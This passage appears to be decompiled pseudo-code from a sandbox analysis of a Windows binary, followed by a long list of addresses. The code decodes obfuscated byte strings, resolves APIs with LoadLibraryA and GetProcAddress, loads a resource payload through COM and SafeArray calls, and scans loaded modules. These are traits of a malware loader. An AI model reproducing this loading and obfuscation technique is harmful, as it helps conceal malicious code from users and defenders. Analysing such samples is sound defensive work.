                                                                      							_t486 =  *(_t559 + 0x40);
                                                                      							_t559 = _t559 + 0xc;
                                                                      							 *(_t559 + 0x50) = _t486;
                                                                      						}
                                                                      						E00401300( *(_t559 + 0x50));
                                                                      						_t497 =  *(_t559 + 0x48);
                                                                      						_t352 = SizeofResource(_t526, _t497);
                                                                      						 *(_t559 + 0x40) = _t352;
                                                                      						asm("cdq");
                                                                      						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                      						__eflags = _t354;
                                                                      						if(_t354 > 0) {
                                                                      							_t519 =  *(_t559 + 0x3c);
                                                                      							_t482 = _t537 - _t519;
                                                                      							__eflags = _t482;
                                                                      							 *(_t559 + 0x34) = _t519;
                                                                      							 *(_t559 + 0x88) = _t482;
                                                                      							 *(_t559 + 0x38) = _t354;
                                                                      							do {
                                                                      								_t424 =  *(_t559 + 0x34);
                                                                      								_push( *(_t559 + 0x88) + _t424);
                                                                      								_push(0x400);
                                                                      								_push(_t424);
                                                                      								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                      								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                      								_t179 = _t559 + 0x38;
                                                                      								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                      								__eflags =  *_t179;
                                                                      							} while ( *_t179 != 0);
                                                                      						}
                                                                      						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                      						__eflags = _t448;
                                                                      						if(_t448 < 0) {
                                                                      							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                      							__eflags = _t448;
                                                                      						}
                                                                      						__eflags = _t448;
                                                                      						if(_t448 > 0) {
                                                                      							_t421 =  *(_t559 + 0x40) - _t448;
                                                                      							_push(_t421 + _t537);
                                                                      							_push(_t448);
                                                                      							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                      							__eflags = _t422;
                                                                      							_push(_t422);
                                                                      							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                      						}
                                                                      						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                      						_t560 = _t559 + 0xc;
                                                                      						FreeResource(_t551);
                                                                      						_t552 =  *_t537;
                                                                      						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                      						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                      						_t561 = _t560 + 4;
                                                                      						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                      						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                      						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                      						_t192 = _t537 + 4; // 0x4
                                                                      						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                      						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                      						_t528 = _t527 + 0xe;
                                                                      						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                      						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                      						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                      						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                      						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                      						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                      						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                      						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                      						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                      						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                      						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                      						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                      						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                      						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                      						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                      						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                      						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                      						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                      						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                      						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                      						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                      						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                      						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                      						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                      						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                      						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                      						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                      						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                      						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                      						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                      						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                      						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                      						 *((char*)(_t561 + 0x54)) = 0;
                                                                      						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                      						_t562 = _t561 + 0x24;
                                                                      						_t365 = LoadLibraryA(_t364); // executed
                                                                      						_t538 = _t365;
                                                                      						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                      						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                      						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                      						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                      						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                      						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                      						_t451 = _t562 + 0x134;
                                                                      						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                      						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                      						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                      						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                      						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                      						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                      						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                      						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                      						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                      						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                      						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                      						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                      						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                      						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                      						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                      						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                      						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                      						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                      						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                      						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                      						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                      						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                      						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                      						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                      						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                      						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                      						 *((char*)(_t562 + 0x38)) = 0;
                                                                      						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                      						_t563 = _t562 + 8;
                                                                      						_t367 = GetProcAddress(_t365, _t366);
                                                                      						__eflags = _t367;
                                                                      						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                      						__eflags = _t452;
                                                                      						 *(_t563 + 0x47) = _t452 == 0;
                                                                      						 *0x423480 = _t367;
                                                                      						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                      						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                      						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                      						 *(_t563 + 0x58) = 0;
                                                                      						 *(_t563 + 0x54) = 0;
                                                                      						__eflags = _t452;
                                                                      						if(_t452 != 0) {
                                                                      							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                      							__eflags = _t368;
                                                                      							if(_t368 >= 0) {
                                                                      								__eflags =  *(_t563 + 0x47);
                                                                      								if( *(_t563 + 0x47) == 0) {
                                                                      									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                      									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                      									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                      									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                      									__eflags = _t378;
                                                                      									if(_t378 >= 0) {
                                                                      										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                      										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                      										__eflags = _t383;
                                                                      										if(_t383 >= 0) {
                                                                      											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                      											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                      											__eflags = _t385;
                                                                      											if(_t385 >= 0) {
                                                                      												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                      												E00401870(_t563 + 0x44, _t552, "_._");
                                                                      												_t539 = __imp__#8;
                                                                      												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                      												 *_t539(_t563 + 0x94);
                                                                      												E00401870(_t563 + 0x3c, _t552, "___");
                                                                      												 *_t539(_t563 + 0xa4);
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                      												_t542 =  *(_t563 + 0x58);
                                                                      												__eflags = _t542;
                                                                      												if(_t542 == 0) {
                                                                      													E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                      												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                      												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                      												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                      												_t543 = _t396;
                                                                      												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                      												__imp__#23(_t543, _t563 + 0x48);
                                                                      												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                      												_t564 = _t563 + 0xc;
                                                                      												__imp__#24(_t543);
                                                                      												_t399 =  *(_t564 + 0x54);
                                                                      												__eflags = _t399;
                                                                      												if(_t399 == 0) {
                                                                      													_t399 = E0040AD90(0x80004003);
                                                                      												}
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                      												__eflags = _t543;
                                                                      												if(_t543 != 0) {
                                                                      													__imp__#16(_t543); // executed
                                                                      												}
                                                                      												_t402 =  *(_t564 + 0x34);
                                                                      												__eflags = _t402;
                                                                      												if(_t402 == 0) {
                                                                      													_t402 = E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t469 =  *(_t564 + 0x40);
                                                                      												_t555 = _t402;
                                                                      												__eflags = _t469;
                                                                      												if(_t469 == 0) {
                                                                      													_t531 = 0;
                                                                      													__eflags = 0;
                                                                      												} else {
                                                                      													_t531 =  *_t469;
                                                                      												}
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                      												__imp__#411(0xc, 0, 0);
                                                                      												_t471 =  *(_t564 + 0x3c);
                                                                      												__eflags = _t471;
                                                                      												if(_t471 == 0) {
                                                                      													E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t405 =  *(_t564 + 0x38);
                                                                      												__eflags = _t405;
                                                                      												if(_t405 == 0) {
                                                                      													_t514 = 0;
                                                                      													__eflags = 0;
                                                                      												} else {
                                                                      													_t514 =  *_t405;
                                                                      												}
                                                                      												_t563 = _t564 - 0x10;
                                                                      												_t407 = _t563;
                                                                      												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                      												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                      												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                      												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                      												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                      												_t538 = __imp__#9; // 0x742dcf00
                                                                      												_t538->i(_t563 + 0xa4);
                                                                      												E004019A0(_t563 + 0x38);
                                                                      												_t538->i(_t563 + 0x94);
                                                                      												_t413 =  *(_t563 + 0x3c);
                                                                      												__eflags = _t413;
                                                                      												if(_t413 != 0) {
                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                      												}
                                                                      												E004019A0(_t563 + 0x40);
                                                                      												_t415 =  *(_t563 + 0x34);
                                                                      												__eflags = _t415;
                                                                      												if(_t415 != 0) {
                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                      									__eflags = _t379 - _t563 + 0x178;
                                                                      									if(__eflags != 0) {
                                                                      										_push(_t379);
                                                                      										E0040B6B5(0, _t528, _t538, __eflags);
                                                                      										_t563 = _t563 + 4;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							_t369 =  *(_t563 + 0x54);
                                                                      							__eflags = _t369;
                                                                      							if(_t369 != 0) {
                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                      							}
                                                                      							_t370 =  *(_t563 + 0x58);
                                                                      							__eflags = _t370;
                                                                      							if(_t370 != 0) {
                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                      							}
                                                                      						}
                                                                      						goto L80;
                                                                      					} else {
                                                                      						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                      						_t565 = _t557 + 8;
                                                                      						_t547 = _t428;
                                                                      						_t520 = _t565 + 0x298;
                                                                      						while(1) {
                                                                      							_t429 =  *_t520;
                                                                      							if(_t429 !=  *_t547) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t429 == 0) {
                                                                      								L7:
                                                                      								_t429 = 0;
                                                                      							} else {
                                                                      								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                      								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                      									break;
                                                                      								} else {
                                                                      									_t520 = _t520 + 2;
                                                                      									_t547 = _t547 + 2;
                                                                      									if(_t493 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L7;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L9:
                                                                      							if(_t429 != 0) {
                                                                      								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                      								_t557 = _t565 + 8;
                                                                      								_t548 = _t431;
                                                                      								_t488 = _t557 + 0x298;
                                                                      								while(1) {
                                                                      									_t432 =  *_t488;
                                                                      									__eflags = _t432 -  *_t548;
                                                                      									if(_t432 !=  *_t548) {
                                                                      										break;
                                                                      									}
                                                                      									__eflags = _t432;
                                                                      									if(_t432 == 0) {
                                                                      										L16:
                                                                      										_t432 = 0;
                                                                      									} else {
                                                                      										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                      										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                      										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                      											break;
                                                                      										} else {
                                                                      											_t488 = _t488 + 2;
                                                                      											_t548 = _t548 + 2;
                                                                      											__eflags = _t432;
                                                                      											if(_t432 != 0) {
                                                                      												continue;
                                                                      											} else {
                                                                      												goto L16;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									L18:
                                                                      									__eflags = _t432;
                                                                      									if(_t432 == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                      										__eflags = _t435;
                                                                      										if(_t435 != 0) {
                                                                      											do {
                                                                      												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                      												_t566 = _t557 + 8;
                                                                      												_t549 = _t437;
                                                                      												_t490 = _t566 + 0x298;
                                                                      												while(1) {
                                                                      													_t438 =  *_t490;
                                                                      													__eflags = _t438 -  *_t549;
                                                                      													if(_t438 !=  *_t549) {
                                                                      														break;
                                                                      													}
                                                                      													__eflags = _t438;
                                                                      													if(_t438 == 0) {
                                                                      														L26:
                                                                      														_t438 = 0;
                                                                      													} else {
                                                                      														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                      														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                      														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                      															break;
                                                                      														} else {
                                                                      															_t490 = _t490 + 2;
                                                                      															_t549 = _t549 + 2;
                                                                      															__eflags = _t438;
                                                                      															if(_t438 != 0) {
                                                                      																continue;
                                                                      															} else {
                                                                      																goto L26;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													L28:
                                                                      													__eflags = _t438;
                                                                      													if(_t438 == 0) {
                                                                      														goto L10;
                                                                      													} else {
                                                                      														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                      														_t557 = _t566 + 8;
                                                                      														_t550 = _t439;
                                                                      														_t492 = _t557 + 0x298;
                                                                      														while(1) {
                                                                      															_t440 =  *_t492;
                                                                      															__eflags = _t440 -  *_t550;
                                                                      															if(_t440 !=  *_t550) {
                                                                      																break;
                                                                      															}
                                                                      															__eflags = _t440;
                                                                      															if(_t440 == 0) {
                                                                      																L34:
                                                                      																_t440 = 0;
                                                                      															} else {
                                                                      																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                      																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                      																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                      																	break;
                                                                      																} else {
                                                                      																	_t492 = _t492 + 2;
                                                                      																	_t550 = _t550 + 2;
                                                                      																	__eflags = _t440;
                                                                      																	if(_t440 != 0) {
                                                                      																		continue;
                                                                      																	} else {
                                                                      																		goto L34;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L36:
                                                                      															__eflags = _t440;
                                                                      															if(_t440 == 0) {
                                                                      																goto L10;
                                                                      															} else {
                                                                      																goto L37;
                                                                      															}
                                                                      															goto L81;
                                                                      														}
                                                                      														asm("sbb eax, eax");
                                                                      														asm("sbb eax, 0xffffffff");
                                                                      														goto L36;
                                                                      													}
                                                                      													goto L81;
                                                                      												}
                                                                      												asm("sbb eax, eax");
                                                                      												asm("sbb eax, 0xffffffff");
                                                                      												goto L28;
                                                                      												L37:
                                                                      												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                      												__eflags = _t442;
                                                                      											} while (_t442 != 0);
                                                                      										}
                                                                      										goto L38;
                                                                      									}
                                                                      									goto L81;
                                                                      								}
                                                                      								asm("sbb eax, eax");
                                                                      								asm("sbb eax, 0xffffffff");
                                                                      								goto L18;
                                                                      							} else {
                                                                      								L10:
                                                                      								CloseHandle(_t525);
                                                                      								return 0;
                                                                      							}
                                                                      							goto L81;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						asm("sbb eax, 0xffffffff");
                                                                      						goto L9;
                                                                      					}
                                                                      				}
                                                                      				L81:
                                                                      			}

































































































                                                                      0x004019f0
                                                                      0x004019f0
                                                                      0x004019fd
                                                                      0x00401a10
                                                                      0x00401a15
                                                                      0x00401a1a
                                                                      0x00401a1f
                                                                      0x00401a24
                                                                      0x00401a29
                                                                      0x00401a2e
                                                                      0x00401a33
                                                                      0x00401a38
                                                                      0x00401a3d
                                                                      0x00401a42
                                                                      0x00401a47
                                                                      0x00401a4c
                                                                      0x00401a51
                                                                      0x00401a56
                                                                      0x00401a5b
                                                                      0x00401a60
                                                                      0x00401a65
                                                                      0x00401a6a
                                                                      0x00401a6f
                                                                      0x00401a74
                                                                      0x00401a79
                                                                      0x00401a7e
                                                                      0x00401a83
                                                                      0x00401a88
                                                                      0x00401a8d
                                                                      0x00401a92
                                                                      0x00401a97
                                                                      0x00401a9c
                                                                      0x00401aa1
                                                                      0x00401aa6
                                                                      0x00401aab
                                                                      0x00401ab0
                                                                      0x00401ab9
                                                                      0x00401aba
                                                                      0x00401abf
                                                                      0x00401ac7
                                                                      0x0040248d
                                                                      0x0040248d
                                                                      0x00402496
                                                                      0x00401acd
                                                                      0x00401ad6
                                                                      0x00401ae2
                                                                      0x00401ae6
                                                                      0x00401af1
                                                                      0x00401af6
                                                                      0x00401afb
                                                                      0x00401b00
                                                                      0x00401b05
                                                                      0x00401b0a
                                                                      0x00401b0f
                                                                      0x00401b14
                                                                      0x00401b19
                                                                      0x00401b1e
                                                                      0x00401b23
                                                                      0x00401b28
                                                                      0x00401b2d
                                                                      0x00401b32
                                                                      0x00401b37
                                                                      0x00401b3c
                                                                      0x00401b41
                                                                      0x00401b46
                                                                      0x00401b4b
                                                                      0x00401b50
                                                                      0x00401b55
                                                                      0x00401b5a
                                                                      0x00401b5f
                                                                      0x00401b64
                                                                      0x00401b69
                                                                      0x00401b6e
                                                                      0x00401b73
                                                                      0x00401b78
                                                                      0x00401b7d
                                                                      0x00401b85
                                                                      0x00401b8d
                                                                      0x00401b95
                                                                      0x00401b9d
                                                                      0x00401ba4
                                                                      0x00401ba9
                                                                      0x00401bae
                                                                      0x00401bb3
                                                                      0x00401bb8
                                                                      0x00401bbd
                                                                      0x00401bc2
                                                                      0x00401bc7
                                                                      0x00401bcc
                                                                      0x00401bd1
                                                                      0x00401bd6
                                                                      0x00401bdb
                                                                      0x00401be0
                                                                      0x00401be5
                                                                      0x00401bea
                                                                      0x00401bef
                                                                      0x00401bf4
                                                                      0x00401bf9
                                                                      0x00401bfe
                                                                      0x00401c03
                                                                      0x00401c08
                                                                      0x00401c0d
                                                                      0x00401c12
                                                                      0x00401c17
                                                                      0x00401c1c
                                                                      0x00401c21
                                                                      0x00401c26
                                                                      0x00401c2b
                                                                      0x00401c30
                                                                      0x00401c35
                                                                      0x00401c3a
                                                                      0x00401c3f
                                                                      0x00401c44
                                                                      0x00401c48
                                                                      0x00401c4f
                                                                      0x00401dc3
                                                                      0x00401dc4
                                                                      0x00401de0
                                                                      0x00401de2
                                                                      0x00401de7
                                                                      0x00401dec
                                                                      0x00401df1
                                                                      0x00401df6
                                                                      0x00401dfb
                                                                      0x00401e00
                                                                      0x00401e05
                                                                      0x00401e0a
                                                                      0x00401e0f
                                                                      0x00401e14
                                                                      0x00401e19
                                                                      0x00401e1e
                                                                      0x00401e23
                                                                      0x00401e28
                                                                      0x00401e2d
                                                                      0x00401e32
                                                                      0x00401e37
                                                                      0x00401e3c
                                                                      0x00401e41
                                                                      0x00401e46
                                                                      0x00401e4b
                                                                      0x00401e50
                                                                      0x00401e55
                                                                      0x00401e5a
                                                                      0x00401e5f
                                                                      0x00401e64
                                                                      0x00401e69
                                                                      0x00401e6e
                                                                      0x00401e73
                                                                      0x00401e78
                                                                      0x00401e7d
                                                                      0x00401e82
                                                                      0x00401e86
                                                                      0x00401e8b
                                                                      0x00401e96
                                                                      0x00401e9a
                                                                      0x00401ea4
                                                                      0x00401eaf
                                                                      0x00401eba
                                                                      0x00401ebf
                                                                      0x00401ec4
                                                                      0x00401ec6
                                                                      0x00401ecb
                                                                      0x00401ece
                                                                      0x00401ed2
                                                                      0x00401ed4
                                                                      0x00401eef
                                                                      0x00401ed6
                                                                      0x00401edd
                                                                      0x00401ee2
                                                                      0x00401ee6
                                                                      0x00401ee9
                                                                      0x00401ee9
                                                                      0x00401ef7
                                                                      0x00401efc
                                                                      0x00401f02
                                                                      0x00401f08
                                                                      0x00401f0c
                                                                      0x00401f15
                                                                      0x00401f18
                                                                      0x00401f1a
                                                                      0x00401f1c
                                                                      0x00401f22
                                                                      0x00401f22
                                                                      0x00401f24
                                                                      0x00401f28
                                                                      0x00401f2f
                                                                      0x00401f33
                                                                      0x00401f33
                                                                      0x00401f40
                                                                      0x00401f45
                                                                      0x00401f4a
                                                                      0x00401f4b
                                                                      0x00401f50
                                                                      0x00401f58
                                                                      0x00401f58
                                                                      0x00401f58
                                                                      0x00401f58
                                                                      0x00401f33
                                                                      0x00401f63
                                                                      0x00401f63
                                                                      0x00401f69
                                                                      0x00401f72
                                                                      0x00401f72
                                                                      0x00401f72
                                                                      0x00401f73
                                                                      0x00401f75
                                                                      0x00401f7b
                                                                      0x00401f80
                                                                      0x00401f81
                                                                      0x00401f86
                                                                      0x00401f86
                                                                      0x00401f8c
                                                                      0x00401f8d
                                                                      0x00401f8d
                                                                      0x00401f9d
                                                                      0x00401fa2
                                                                      0x00401fa6
                                                                      0x00401fac
                                                                      0x00401faf
                                                                      0x00401fb6
                                                                      0x00401fbf
                                                                      0x00401fc4
                                                                      0x00401fc8
                                                                      0x00401fce
                                                                      0x00401fd3
                                                                      0x00401fe0
                                                                      0x00401fec
                                                                      0x00401ffe
                                                                      0x00402001
                                                                      0x00402006
                                                                      0x0040200b
                                                                      0x00402010
                                                                      0x00402015
                                                                      0x0040201a
                                                                      0x0040201f
                                                                      0x00402024
                                                                      0x00402029
                                                                      0x0040202e
                                                                      0x00402033
                                                                      0x00402038
                                                                      0x0040203d
                                                                      0x00402042
                                                                      0x00402047
                                                                      0x0040204c
                                                                      0x00402051
                                                                      0x00402056
                                                                      0x0040205b
                                                                      0x00402060
                                                                      0x00402065
                                                                      0x0040206a
                                                                      0x0040206f
                                                                      0x00402074
                                                                      0x00402079
                                                                      0x0040207e
                                                                      0x00402083
                                                                      0x00402088
                                                                      0x0040208d
                                                                      0x00402092
                                                                      0x00402097
                                                                      0x0040209c
                                                                      0x004020a1
                                                                      0x004020a5
                                                                      0x004020aa
                                                                      0x004020ae
                                                                      0x004020b4
                                                                      0x004020b6
                                                                      0x004020bb
                                                                      0x004020c0
                                                                      0x004020c5
                                                                      0x004020ca
                                                                      0x004020cf
                                                                      0x004020d4
                                                                      0x004020e1
                                                                      0x004020e6
                                                                      0x004020eb
                                                                      0x004020f0
                                                                      0x004020f5
                                                                      0x004020fa
                                                                      0x004020ff
                                                                      0x00402104
                                                                      0x00402109
                                                                      0x0040210e
                                                                      0x00402113
                                                                      0x00402118
                                                                      0x0040211d
                                                                      0x00402122
                                                                      0x00402127
                                                                      0x0040212c
                                                                      0x00402131
                                                                      0x00402136
                                                                      0x0040213b
                                                                      0x00402140
                                                                      0x00402145
                                                                      0x0040214a
                                                                      0x0040214f
                                                                      0x00402154
                                                                      0x00402159
                                                                      0x0040215e
                                                                      0x00402163
                                                                      0x00402167
                                                                      0x0040216c
                                                                      0x00402171
                                                                      0x00402177
                                                                      0x00402179
                                                                      0x0040217c
                                                                      0x0040217e
                                                                      0x00402183
                                                                      0x00402188
                                                                      0x0040218f
                                                                      0x00402196
                                                                      0x0040219a
                                                                      0x0040219e
                                                                      0x004021a2
                                                                      0x004021a4
                                                                      0x004021bc
                                                                      0x004021be
                                                                      0x004021c0
                                                                      0x004021c6
                                                                      0x004021ca
                                                                      0x004021e5
                                                                      0x004021ec
                                                                      0x004021f1
                                                                      0x00402213
                                                                      0x00402215
                                                                      0x00402217
                                                                      0x0040221d
                                                                      0x00402239
                                                                      0x0040223b
                                                                      0x0040223d
                                                                      0x00402243
                                                                      0x0040224d
                                                                      0x0040224f
                                                                      0x00402251
                                                                      0x00402260
                                                                      0x00402264
                                                                      0x00402269
                                                                      0x00402277
                                                                      0x0040227b
                                                                      0x00402286
                                                                      0x00402293
                                                                      0x004022af
                                                                      0x004022b1
                                                                      0x004022b5
                                                                      0x004022b7
                                                                      0x004022be
                                                                      0x004022be
                                                                      0x004022d7
                                                                      0x004022e8
                                                                      0x004022ef
                                                                      0x004022f6
                                                                      0x00402300
                                                                      0x00402304
                                                                      0x00402308
                                                                      0x00402315
                                                                      0x0040231a
                                                                      0x0040231e
                                                                      0x00402324
                                                                      0x00402328
                                                                      0x0040232a
                                                                      0x00402331
                                                                      0x00402331
                                                                      0x0040234e
                                                                      0x00402350
                                                                      0x00402352
                                                                      0x00402355
                                                                      0x00402355
                                                                      0x0040235b
                                                                      0x0040235f
                                                                      0x00402361
                                                                      0x00402368
                                                                      0x00402368
                                                                      0x0040236d
                                                                      0x00402371
                                                                      0x00402373
                                                                      0x00402375
                                                                      0x0040237b
                                                                      0x0040237b
                                                                      0x00402377
                                                                      0x00402377
                                                                      0x00402377
                                                                      0x00402390
                                                                      0x00402396
                                                                      0x0040239c
                                                                      0x004023a0
                                                                      0x004023a2
                                                                      0x004023a9
                                                                      0x004023a9
                                                                      0x004023ae
                                                                      0x004023b2
                                                                      0x004023b4
                                                                      0x004023ba
                                                                      0x004023ba
                                                                      0x004023b6
                                                                      0x004023b6
                                                                      0x004023b6
                                                                      0x004023ce
                                                                      0x004023d1
                                                                      0x004023d3
